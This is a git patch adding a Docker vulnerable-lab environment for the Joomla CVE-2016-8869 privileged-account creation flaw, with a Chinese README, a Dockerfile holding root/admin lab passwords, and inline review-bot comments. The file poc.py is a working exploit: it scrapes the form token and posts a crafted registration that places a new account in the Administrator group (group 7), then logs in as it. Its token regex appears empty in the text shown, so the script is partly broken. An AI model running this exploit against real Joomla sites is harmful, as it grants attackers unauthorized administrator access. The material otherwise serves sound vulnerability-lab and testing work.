From ef15ac4bda4bfe1be9ab8a947adaa3374d2275b6 Mon Sep 17 00:00:00 2001 From: Medicean Date: Mon, 31 Oct 2016 00:58:50 +0800 Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=20Joomla=E6=9C=AA=E6=8E=88?= =?UTF-8?q?=E6=9D=83=E5=88=9B=E5=BB=BA=E7=89=B9=E6=9D=83=E7=94=A8=E6=88=B7?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E(CVE-2016-8869)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 1 + j/README.md | 1 + j/joomla/1/Dockerfile | 7 ++++ j/joomla/1/README.md | 65 +++++++++++++++++++++++++++++++++ j/joomla/1/poc.py | 83 +++++++++++++++++++++++++++++++++++++++++++ j/joomla/README.md | 3 ++ 6 files changed, 160 insertions(+) create mode 100644 j/joomla/1/Dockerfile create mode 100644 j/joomla/1/README.md create mode 100644 j/joomla/1/poc.py create mode 100644 j/joomla/README.md diff --git a/README.md b/README.md index 72a29bf..9aeb987 100644 --- a/README.md +++ b/README.md @@ -79,6 +79,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037 ### [J](./j/)
* [Jenkins](./j/jenkins/) +* [Joomla!](./j/joomla/) ### [O](./o/)
diff --git a/j/README.md b/j/README.md index ece05a8..d6242b6 100644 --- a/j/README.md +++ b/j/README.md @@ -1,3 +1,4 @@ # J * [Jenkins](./jenkins/) +* [Joomla!](./joomla/) diff --git a/j/joomla/1/Dockerfile b/j/joomla/1/Dockerfile new file mode 100644 index 0000000..daf37e3 --- /dev/null +++ b/j/joomla/1/Dockerfile @@ -0,0 +1,7 @@ +FROM medicean/vulapps:base_joomla_3.5 + +RUN /etc/init.d/mysql restart \ + && mysql -e "use joomla;update kmxhf_extensions set params=replace(params, 0x227573657261637469766174696f6e223a223222, 0x227573657261637469766174696f6e223a223022);update kmxhf_extensions set params=replace(params, 0x227573657261637469766174696f6e223a223122, 0x227573657261637469766174696f6e223a223022);" -uroot -proot + +EXPOSE 80 +CMD ["/start.sh"] diff --git a/j/joomla/1/README.md b/j/joomla/1/README.md new file mode 100644 index 0000000..29b27c4 --- /dev/null +++ b/j/joomla/1/README.md 
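Review bot: The two hex literals in the `mysql -e` statement of the `RUN` step are opaque to a reader; they decode to `"useractivation":"2"` and `"useractivation":"1"` being rewritten to `"useractivation":"0"` in `kmxhf_extensions.params` (presumably the com_users row), which removes the e-mail/admin activation step so new accounts are usable immediately in the lab. A comment above the step should say so, e.g. `# Lab only: set com_users "useractivation" to 0 so registered accounts need no activation step`. The same step restarts MySQL inside a build layer and passes `-proot` on the command line; acceptable for a throwaway lab image, but the comment should mark the credentials as lab-only so the Dockerfile is not copied as a template.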
@@ -0,0 +1,65 @@
+Joomla未授权创建特权用户漏洞(CVE-2016-8869)
+---
+
+### 漏洞信息
+
+Joomla 3.4.4到3.6.3的版本中,攻击者可以在网站关闭注册的情况下注册用户。
+
+详细参考:[Joomla 3.4.4 - 3.6.3 未授权创建用户漏洞](https://www.seebug.org/vuldb/ssvid-92496)
+
+### 镜像信息
+
+类型 | 用户名 | 密码
+:-:|:-:|:-:
+Mysql | root | root
+/administrator/ | admin | admin123
+
+
+### 获取环境:
+
+1. 拉取镜像到本地
+
+ ```
+$ docker pull medicean/vulapps:j_joomla_1
+ ```
+
+2. 启动环境
+
+ ```
+$ docker run -d -p 8000:80 medicean/vulapps:j_joomla_1
+ ```
+ > `-p 8000:80` 前面的 8000 代表物理机的端口,可随意指定。
+
+### 使用与利用
+
+访问 `http://你的 IP 地址:端口号/`
+
+### PoC 使用
+
+> 本例中使用 [Joomla未授权创建特权用户漏洞(CVE-2016-8869)检测 PoC](http://www.bugscan.net/source/plugin/4669/template/)
+
+
+1. 下载并安装 `BugScan SDK`
+
+ 详见 [BugScan 插件开发文档 - 环境配置](http://doc.bugscan.net/chapter1/1-1.html)
+
+2. 修改 `poc.py` 中地址为容器地址
+
+ ```
+if __name__ == '__main__':
+ from dummy import *
+ audit(assign(fingerprint.joomla, "http://localhost:8000")[1])
+
+ ```
+
+3. 运行 `poc.py`
+
+ ```
+$ python poc.py
+ ```
+
+### 相关链接
+
+* [Joomla 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation](https://www.exploit-db.com/exploits/40637/)
+* [Joomla 3.4.4 - 3.6.3 未授权创建用户漏洞](https://www.seebug.org/vuldb/ssvid-92496)
+[Joomla 未授权创建特权用户漏洞(CVE-2016-8869)检测 PoC](http://www.bugscan.net/source/plugin/4669/template/)
diff --git a/j/joomla/1/poc.py b/j/joomla/1/poc.py
new file mode 100644
index 0000000..38b8eba
--- /dev/null
+++ b/j/joomla/1/poc.py
@@ -0,0 +1,83 @@ +#!/usr/bin/evn python +# -*-:coding:utf-8 -*- + +import hashlib +import uuid +import re + + +def assign(service, arg): + if service == fingerprint.joomla: + return True, arg + + +def audit(arg): + url = arg + "index.php/component/users/?task=user.register" + code, head, res, redir_url, log1 = hackhttp.http(url) + p = re.compile(r'') + token = p.findall(res)[0] + password = hashlib.md5(str(uuid.uuid1())).hexdigest() + payload = """-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="user[name]"\r +\r +{username}\r +-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="user[username]"\r +\r +{username}\r +-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="user[password1]"\r +\r +{password}\r +-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="user[password2]"\r +\r +{password}\r +-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="user[email1]"\r +\r +{email}\r +-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="user[email2]"\r +\r +{email}\r +-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="option"\r +\r +com_users\r +-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="user[groups][]"\r +\r +7\r +-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="task"\r +\r +user.register\r +-----------------------------11366146071214659784807441306\r +Content-Disposition: form-data; name="{token}"\r +\r +1\r +-----------------------------11366146071214659784807441306--\r +""".format( + username=password, token=token, password=password, + email="%s@vulcheck.com" % (password)) + head = { + 'Referer': arg + 
'index.php/component/users/?view=registration', + 'Content-Type': 'multipart/form-data; boundary=---------------------------11366146071214659784807441306' + } + code, head, res, redir_url, log2 = hackhttp.http( + url, data=payload, headers=head) + + login_url = arg + '/administrator/index.php' + code, head, res, redir_url, log3 = hackhttp.http(login_url) + token = p.findall(res)[0] + login_data = "username={username}&passwd={password}&option=com_login&task=login&return=aW5kZXgucGhw&{token}=1".format( + username=password, token=token, password=password) + code, head, res, redir_url, log4 = hackhttp.http(login_url, data=login_data) + code, head, res, redir_url, log5 = hackhttp.http(login_url) + if 'System ' in res: + security_hole(arg, log=log2) + +if __name__ == '__main__': + from dummy import * + audit(assign(fingerprint.joomla, "http://127.0.0.1:32773/")[1]) diff --git a/j/joomla/README.md b/j/joomla/README.md new file mode 100644 index 0000000..5406e92 --- /dev/null +++ b/j/joomla/README.md @@ -0,0 +1,3 @@ +# Joomla! VulApps + +* [Joomla未授权创建特权用户漏洞(CVE-2016-8869)](./1/)
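Review bot: The shebang on the first line of poc.py reads `#!/usr/bin/evn python`, so the file cannot be executed directly; it should be `#!/usr/bin/env python`. `hashlib.md5(str(uuid.uuid1()))` also only works under Python 2, because Python 3's md5 rejects a str, so the interpreter version belongs in a module docstring. `audit` has no docstring; it should state that a successful check leaves a new account in group 7 on the target (the Administrator group in a default Joomla install, if the group ids are unchanged) and that the account is never removed, which matters on any shared instance. The token pattern appears in this diff as `re.compile(r'')`; if that is a rendering artifact it is harmless, otherwise `p.findall(res)[0]` yields an empty string rather than the form token. As a point of style, the response-header variable `head` is later rebound to the request-header dict, and `log1`, `log3`, `log4` and `log5` are assigned but never used.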